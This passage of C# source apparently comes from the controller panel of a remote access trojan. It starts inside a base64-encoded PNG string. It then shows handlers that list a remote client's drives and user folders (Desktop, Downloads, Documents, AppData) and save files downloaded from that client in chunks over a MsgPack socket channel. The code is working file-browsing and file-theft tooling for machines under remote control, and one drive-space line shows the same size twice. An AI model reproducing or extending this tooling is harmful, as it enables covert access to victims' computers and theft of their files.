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"))));
                    FM.AreListview2.Groups.Clear();
                    FM.pr.Value = 50;
                    ListViewGroup groupFolder = new ListViewGroup("Folders");
                    ListViewGroup groupFile = new ListViewGroup("Files");
                    FM.AreListview2.Groups.Add(groupFolder);
                    FM.AreListview2.Groups.Add(groupFile);
                    ListView.ListViewItemCollection items = FM.AreListview2.Items;
                    items.AddRange(await Task.Run(() => GetFolders(unpack_msgpack, groupFolder).ToArray()));
                    ListView.ListViewItemCollection items2 = FM.AreListview2.Items;
                    items2.AddRange(await Task.Run(() => GetFiles(unpack_msgpack, groupFile, FM.imageList1).ToArray()));
                    FM.pr.Value = 100;
                    FM.AreListview2.Enabled = true;
                    FM.AreListview2.Focus();
                    FM.AreListview2.EndUpdate();
                    FM.FolderLen.Text = FM.AreListview2.Groups[0].Items.Count + " Folder  |  " + FM.AreListview2.Groups[1].Items.Count + " Files";
                    FM.pr.Value = 0;
                }
                break;
            case "getDrivers":
                {
                    if (FM == null)
                    {
                        break;
                    }
                    int C = 0;
                    FM.TextBox1.Text = "";
                    FM.AeroListView1.Items.Clear();
                    string[] driver = unpack_msgpack.ForcePathObject("Driver").AsString.Split(new string[1] { "-=>" }, StringSplitOptions.None);
                    int j;
                    for (j = 0; j <= driver.Length - 1; j++)
                    {
                        if (driver[j].Length > 0)
                        {
                            ListViewItem lv = new ListViewItem
                            {
                                Text = driver[j],
                                ToolTipText = driver[j]
                            };
                            if (driver[j] == "Desktop")
                            {
                                lv.SubItems.Add(driver[j + 1]);
                                lv.Group = FM.AeroListView1.Groups["Folder"];
                                lv.ImageIndex = 5;
                            }
                            else if (driver[j] == "Downloads")
                            {
                                lv.SubItems.Add(driver[j + 1]);
                                lv.Group = FM.AeroListView1.Groups["Folder"];
                                lv.ImageIndex = 9;
                            }
                            else if (driver[j] == "Documents")
                            {
                                lv.SubItems.Add(driver[j + 1]);
                                lv.Group = FM.AeroListView1.Groups["Folder"];
                                lv.ImageIndex = 8;
                            }
                            else if (driver[j] == "Music")
                            {
                                lv.SubItems.Add(driver[j + 1]);
                                lv.Group = FM.AeroListView1.Groups["Folder"];
                                lv.ImageIndex = 13;
                            }
                            else if (driver[j] == "Pictures")
                            {
                                lv.SubItems.Add(driver[j + 1]);
                                lv.Group = FM.AeroListView1.Groups["Folder"];
                                lv.ImageIndex = 6;
                            }
                            else if (driver[j] == "Videos")
                            {
                                lv.SubItems.Add(driver[j + 1]);
                                lv.Group = FM.AeroListView1.Groups["Folder"];
                                lv.ImageIndex = 7;
                            }
                            else if (driver[j] == "AppData")
                            {
                                lv.SubItems.Add(driver[j + 1]);
                                lv.Group = FM.AeroListView1.Groups["Folder"];
                                lv.ImageIndex = 0;
                            }
                            else if (driver[j] == "User")
                            {
                                lv.SubItems.Add(driver[j + 1]);
                                lv.Group = FM.AeroListView1.Groups["Folder"];
                                lv.ImageIndex = 0;
                            }
                            else
                            {
                                string[] sz = Strings.Split(driver[j + 1], "|Size|");
                                lv.SubItems.Add(Methods.BytesToString(long.Parse(sz[0])) + " free of " + Methods.BytesToString(long.Parse(sz[0])));
                                if (driver[j] == "C:\\")
                                {
                                    lv.Group = FM.AeroListView1.Groups["Devices and Drives"];
                                    lv.ImageIndex = 10;
                                    C++;
                                }
                                else
                                {
                                    lv.Group = FM.AeroListView1.Groups["Devices and Drives"];
                                    lv.ImageIndex = 1;
                                    C++;
                                }
                            }
                            FM.AeroListView1.Items.Add(lv);
                            FM.AeroListView1.Groups["Folder"].Header = "Folder (8)";
                            FM.AeroListView1.Groups["Devices and Drives"].Header = "Devices and Drives (" + C + ")";
                        }
                        j++;
                    }
                    break;
                }
        }
    }

    public async void SocketDownload(Clients client, MsgPack unpack_msgpack)
    {
        try
        {
            switch (unpack_msgpack.ForcePathObject("Command").AsString)
            {
                case "save":
                    {
                        Manager FM2 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (FM2 == null)
                        {
                            break;
                        }
                        string dwid2 = unpack_msgpack.ForcePathObject("DWID").AsString;
                        _ = unpack_msgpack.ForcePathObject("Size").AsString;
                        int Index2 = int.Parse(unpack_msgpack.ForcePathObject("Index").AsString);
                        byte[] ByteFile = unpack_msgpack.ForcePathObject("ByteFile").GetAsBytes();
                        Control[] temp = FM2.LayoutPanelDownload.Controls.Find("Download:" + dwid2, searchAllChildren: true);
                        try
                        {
                            if (temp.Length == 0)
                            {
                                break;
                            }
                            DownloadUserControl1 uc2 = (DownloadUserControl1)FM2.LayoutPanelDownload.Controls[Index2];
                            lock (uc2.SyncLock)
                            {
                                if (!uc2.IsRunning)
                                {
                                    break;
                                }
                                uc2.FS.Write(ByteFile, 0, ByteFile.Length);
                                uc2.Progss.Value = Convert.ToInt32((double)(uc2.FS.Length * 100L) / (double)uc2.SizeFile);
                                uc2.TitleForm.Text = "(" + Methods.BytesToString(uc2.SizeFile) + "\\" + Methods.BytesToString(uc2.FS.Length) + ") Downloading...";
                                if (uc2.FS.Length >= uc2.SizeFile)
                                {
                                    uc2.TitleForm.Text = "(" + Methods.BytesToString(uc2.FS.Length) + ") Downloaded";
                                    uc2.TitleForm.ForeColor = Color.LimeGreen;
                                    uc2.FS.Close();
                                    File.Move(uc2.ExtraFileTemp, uc2.SaveFile);
                                    uc2.Progss.Value = 0;
                                    uc2.IsRunning = false;
                                }
                            }
                        }
                        catch
                        {
                            DownloadUserControl1 uc = (DownloadUserControl1)FM2.LayoutPanelDownload.Controls[Index2];
                            uc.FS.Close();
                            uc.TitleForm.Text = "Error!";
                            uc.TitleForm.ForeColor = Color.Red;
                            if (File.Exists(uc.ExtraFileTemp))
                            {
                                File.Delete(uc.ExtraFileTemp);
                            }
                            uc.IsRunning = false;
                        }
                        finally
                        {
                            GC.Collect();
                        }
                        break;
                    }
                case "pre":
                    {
                        Manager FM3 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (FM3 == null)
                        {
                            break;
                        }
                        Bitmap bmpIcon = new Bitmap(Resources.IconInstalled, new Size(38, 38));
                        string dwid3 = unpack_msgpack.ForcePathObject("DWID").AsString;
                        _ = unpack_msgpack.ForcePathObject("Filename").AsString;
                        string size = unpack_msgpack.ForcePathObject("Size").AsString;
                        string IconFile = unpack_msgpack.ForcePathObject("Icon").AsString;
                        int Index3 = int.Parse(unpack_msgpack.ForcePathObject("Index").AsString);
                        Control[] temp3 = FM3.LayoutPanelDownload.Controls.Find("Download:" + dwid3, searchAllChildren: true);
                        try
                        {
                            if (temp3.Length != 0)
                            {
                                DownloadUserControl1 uc5 = (DownloadUserControl1)FM3.LayoutPanelDownload.Controls[Index3];
                                uc5.IsRunning = true;
                                uc5.CreateFile();
                                uc5.Progss.Image = ((!string.IsNullOrEmpty(IconFile)) ? Image.FromStream(new MemoryStream(Convert.FromBase64String(IconFile))) : bmpIcon);
                                uc5.WaitingDownload.Visible = false;
                                uc5.SizeFile = long.Parse(size);
                            }
                        }
                        catch (Exception ex2)
                        {
                            Exception ex = ex2;
                            MessageBox.Show("err1" + ex.ToString());
                            DownloadUserControl1 uc3 = (DownloadUserControl1)FM3.LayoutPanelDownload.Controls[Index3];
                            uc3.FS.Close();
                            uc3.Controls.Clear();
                            uc3.IsRunning = false;
